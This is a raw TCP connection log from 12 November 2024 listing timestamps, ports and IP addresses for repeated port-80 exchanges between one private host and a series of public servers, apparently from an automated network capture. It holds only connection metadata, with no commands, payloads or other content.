Nov 12, 2024 15:32:55.504607916 CET	80	49769	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:55.504905939 CET	49769	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:55.513207912 CET	49769	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:55.632649899 CET	80	49769	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:55.650116920 CET	80	49769	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:55.650387049 CET	49769	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:57.023288012 CET	49769	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:57.140317917 CET	80	49769	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:58.040738106 CET	49770	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:58.176886082 CET	80	49770	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:58.177058935 CET	49770	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:58.185039997 CET	49770	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:58.185067892 CET	49770	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:58.185115099 CET	49770	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:58.319587946 CET	80	49770	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:58.319705009 CET	80	49770	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:58.319818974 CET	80	49770	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:58.319892883 CET	80	49770	3.33.130.190	192.168.11.20
Nov 12, 2024 15:33:00.712081909 CET	49771	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:33:00.846951962 CET	80	49771	3.33.130.190	192.168.11.20
Nov 12, 2024 15:33:00.847081900 CET	49771	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:33:00.852329016 CET	49771	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:33:00.986290932 CET	80	49771	3.33.130.190	192.168.11.20
Nov 12, 2024 15:33:00.987587929 CET	80	49771	3.33.130.190	192.168.11.20
Nov 12, 2024 15:33:00.987597942 CET	80	49771	3.33.130.190	192.168.11.20
Nov 12, 2024 15:33:00.987859011 CET	49771	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:33:00.989943027 CET	49771	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:33:01.123833895 CET	80	49771	3.33.130.190	192.168.11.20
Nov 12, 2024 15:33:06.286231995 CET	49772	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:06.422755003 CET	80	49772	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:06.422967911 CET	49772	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:06.430661917 CET	49772	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:06.570781946 CET	80	49772	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:06.570797920 CET	80	49772	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:06.570807934 CET	80	49772	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:06.571036100 CET	49772	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:07.942773104 CET	49772	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:08.960237980 CET	49773	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:09.084017038 CET	80	49773	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:09.084248066 CET	49773	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:09.092072964 CET	49773	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:09.209547997 CET	80	49773	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:09.227420092 CET	80	49773	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:09.227469921 CET	80	49773	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:09.227505922 CET	80	49773	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:09.227658033 CET	49773	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:09.227798939 CET	49773	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:09.233069897 CET	80	49773	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:09.233201027 CET	49773	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:10.598475933 CET	49773	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:11.616027117 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:11.740223885 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.740509987 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:11.752958059 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:11.753031015 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:11.870579004 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.870620012 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.870650053 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.870743036 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.870831966 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.870981932 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.871016026 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.888657093 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.888705969 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.888741016 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.888868093 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:11.888989925 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:11.895585060 CET	80	49774	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:11.895788908 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:13.254192114 CET	49774	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:14.271706104 CET	49775	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:14.411540985 CET	80	49775	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:14.411739111 CET	49775	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:14.417087078 CET	49775	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:14.555088043 CET	80	49775	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:14.555140018 CET	80	49775	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:14.555175066 CET	80	49775	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:14.555422068 CET	49775	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:14.557270050 CET	49775	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:14.691839933 CET	80	49775	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:19.817847967 CET	49776	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:19.952356100 CET	80	49776	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:19.952662945 CET	49776	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:19.961199045 CET	49776	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:20.096149921 CET	80	49776	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:20.096163034 CET	80	49776	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:20.096237898 CET	80	49776	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:20.096457958 CET	49776	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:21.471190929 CET	49776	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:22.488537073 CET	49777	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:22.605952024 CET	80	49777	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:22.606228113 CET	49777	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:22.613907099 CET	49777	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:22.738725901 CET	80	49777	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:22.757242918 CET	80	49777	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:22.757293940 CET	80	49777	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:22.757354021 CET	80	49777	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:22.757474899 CET	49777	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:22.757539988 CET	49777	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:22.761090040 CET	80	49777	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:22.761338949 CET	49777	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:24.126877069 CET	49777	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:25.147224903 CET	49778	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:25.264568090 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.264764071 CET	49778	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:25.272731066 CET	49778	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:25.272809982 CET	49778	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:25.390064955 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.390384912 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.390399933 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.390408993 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.390419006 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.390428066 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.390438080 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.407622099 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.407639027 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.407651901 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.407886982 CET	49778	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:25.413623095 CET	80	49778	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:25.413836956 CET	49778	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:26.782412052 CET	49778	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:27.799951077 CET	49779	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:27.935018063 CET	80	49779	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:27.935221910 CET	49779	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:27.940453053 CET	49779	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:28.075597048 CET	80	49779	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:28.075615883 CET	80	49779	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:28.075627089 CET	80	49779	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:28.075926065 CET	49779	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:28.077950001 CET	49779	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:33:28.212038040 CET	80	49779	199.59.243.227	192.168.11.20
Nov 12, 2024 15:33:36.170994043 CET	49780	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:33:36.483921051 CET	80	49780	206.119.81.121	192.168.11.20
Nov 12, 2024 15:33:36.484174967 CET	49780	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:33:36.489474058 CET	49780	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:33:36.804472923 CET	80	49780	206.119.81.121	192.168.11.20
Nov 12, 2024 15:33:36.804577112 CET	80	49780	206.119.81.121	192.168.11.20
Nov 12, 2024 15:33:36.804878950 CET	49780	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:33:36.806917906 CET	49780	80	192.168.11.20	206.119.81.121
Nov 12, 2024 15:33:37.119842052 CET	80	49780	206.119.81.121	192.168.11.20
Nov 12, 2024 15:33:41.812578917 CET	49781	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:42.134032011 CET	80	49781	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:42.134300947 CET	49781	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:42.142107010 CET	49781	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:42.464503050 CET	80	49781	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:42.465173960 CET	80	49781	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:42.465220928 CET	80	49781	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:42.465440989 CET	49781	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:43.653800964 CET	49781	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:44.671263933 CET	49782	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:44.995014906 CET	80	49782	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:44.995261908 CET	49782	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:45.002990961 CET	49782	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:45.323450089 CET	80	49782	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:45.323919058 CET	80	49782	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:45.323992014 CET	80	49782	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:45.324228048 CET	49782	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:46.512507915 CET	49782	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:47.531838894 CET	49783	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:47.852586985 CET	80	49783	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:47.852868080 CET	49783	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:47.860832930 CET	49783	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:47.860907078 CET	49783	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:48.181205034 CET	80	49783	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:48.181246042 CET	80	49783	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:48.181274891 CET	80	49783	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:48.181304932 CET	80	49783	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:48.181852102 CET	80	49783	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:48.181902885 CET	80	49783	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:48.182106972 CET	49783	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:49.371247053 CET	49783	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:50.388745070 CET	49784	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:50.714140892 CET	80	49784	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:50.714437008 CET	49784	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:50.720370054 CET	49784	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:51.050955057 CET	80	49784	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:51.050966024 CET	80	49784	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:51.050973892 CET	80	49784	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:51.051337957 CET	49784	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:51.053392887 CET	49784	80	192.168.11.20	47.52.221.8
Nov 12, 2024 15:33:51.386769056 CET	80	49784	47.52.221.8	192.168.11.20
Nov 12, 2024 15:33:56.059827089 CET	49785	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:56.382410049 CET	80	49785	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:56.382745028 CET	49785	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:56.390572071 CET	49785	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:56.713064909 CET	80	49785	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:56.719913006 CET	80	49785	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:56.719928980 CET	80	49785	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:56.720135927 CET	49785	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:57.900619984 CET	49785	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:58.918185949 CET	49786	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:59.235781908 CET	80	49786	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:59.235951900 CET	49786	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:59.243787050 CET	49786	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:33:59.556941032 CET	80	49786	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:59.563903093 CET	80	49786	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:59.563947916 CET	80	49786	154.38.64.6	192.168.11.20
Nov 12, 2024 15:33:59.564053059 CET	49786	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:00.759515047 CET	49786	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:01.776880026 CET	49787	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:02.101162910 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.101360083 CET	49787	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:02.109790087 CET	49787	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:02.109862089 CET	49787	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:02.434086084 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.434129953 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.434159040 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.434263945 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.434294939 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.434324026 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.441257954 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.441303015 CET	80	49787	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:02.441564083 CET	49787	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:03.618169069 CET	49787	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:04.635623932 CET	49788	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:04.957448006 CET	80	49788	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:04.957685947 CET	49788	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:04.962903976 CET	49788	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:05.282706022 CET	80	49788	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:05.288237095 CET	80	49788	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:05.288248062 CET	80	49788	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:05.288592100 CET	49788	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:05.290451050 CET	49788	80	192.168.11.20	154.38.64.6
Nov 12, 2024 15:34:05.615592957 CET	80	49788	154.38.64.6	192.168.11.20
Nov 12, 2024 15:34:10.306292057 CET	49789	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:10.547792912 CET	80	49789	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:10.547935963 CET	49789	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:10.555835009 CET	49789	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:10.798808098 CET	80	49789	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:10.799591064 CET	80	49789	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:13.086903095 CET	49790	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:13.327068090 CET	80	49790	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:13.327231884 CET	49790	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:13.335037947 CET	49790	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:13.575136900 CET	80	49790	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:13.575241089 CET	80	49790	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:15.867558002 CET	49791	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:16.107140064 CET	80	49791	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:16.107387066 CET	49791	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:16.115364075 CET	49791	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:16.115469933 CET	49791	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:16.359406948 CET	80	49791	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:16.359762907 CET	80	49791	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:18.648308039 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:18.890261889 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:18.890585899 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:18.895777941 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:19.146665096 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.146723986 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.146769047 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.146811008 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.146855116 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.146897078 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.146939039 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.146984100 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.147027969 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:19.147113085 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:19.147113085 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:19.147269011 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:19.147430897 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:19.149190903 CET	49792	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:34:19.397979021 CET	80	49792	84.32.84.32	192.168.11.20
Nov 12, 2024 15:34:24.162633896 CET	49793	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:24.299072981 CET	80	49793	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:24.299391985 CET	49793	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:24.307627916 CET	49793	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:24.444039106 CET	80	49793	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:26.834124088 CET	49794	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:26.970221996 CET	80	49794	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:26.970484972 CET	49794	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:26.979526043 CET	49794	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:27.115643978 CET	80	49794	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:29.505631924 CET	49795	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:29.650516987 CET	80	49795	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:29.650728941 CET	49795	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:29.658507109 CET	49795	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:29.658535957 CET	49795	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:29.794750929 CET	80	49795	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.192068100 CET	49796	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:32.328311920 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.328517914 CET	49796	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:32.334269047 CET	49796	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:32.520824909 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.753819942 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.753840923 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.753850937 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.753956079 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.753968000 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:32.754057884 CET	49796	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:32.754224062 CET	49796	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:32.756076097 CET	49796	80	192.168.11.20	208.91.197.27
Nov 12, 2024 15:34:32.892280102 CET	80	49796	208.91.197.27	192.168.11.20
Nov 12, 2024 15:34:37.769085884 CET	49797	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:37.936220884 CET	80	49797	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:37.936578035 CET	49797	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:37.944828033 CET	49797	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:38.111823082 CET	80	49797	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:38.124049902 CET	80	49797	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:38.124108076 CET	80	49797	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:38.124305964 CET	49797	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:39.454123974 CET	49797	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:40.471736908 CET	49798	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:40.639731884 CET	80	49798	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:40.639908075 CET	49798	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:40.654345036 CET	49798	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:40.821537018 CET	80	49798	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:40.832247972 CET	80	49798	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:40.832293987 CET	80	49798	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:40.832489014 CET	49798	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:42.156538010 CET	49798	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:43.174330950 CET	49799	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:43.352835894 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.353087902 CET	49799	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:43.361594915 CET	49799	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:43.361666918 CET	49799	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:43.540148020 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.540189981 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.540219069 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.540290117 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.540414095 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.554152966 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.554260969 CET	80	49799	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:43.554421902 CET	49799	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:44.874877930 CET	49799	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:45.892288923 CET	49800	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:46.070839882 CET	80	49800	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:46.071099043 CET	49800	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:46.076700926 CET	49800	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:46.255086899 CET	80	49800	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:46.269095898 CET	80	49800	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:46.269201994 CET	80	49800	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:46.269428968 CET	49800	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:46.271390915 CET	49800	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:34:46.449990988 CET	80	49800	203.161.49.193	192.168.11.20
Nov 12, 2024 15:34:51.281718016 CET	49801	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:51.416915894 CET	80	49801	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:51.417068005 CET	49801	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:51.425786018 CET	49801	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:51.560501099 CET	80	49801	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:51.561923027 CET	80	49801	13.248.169.48	192.168.11.20
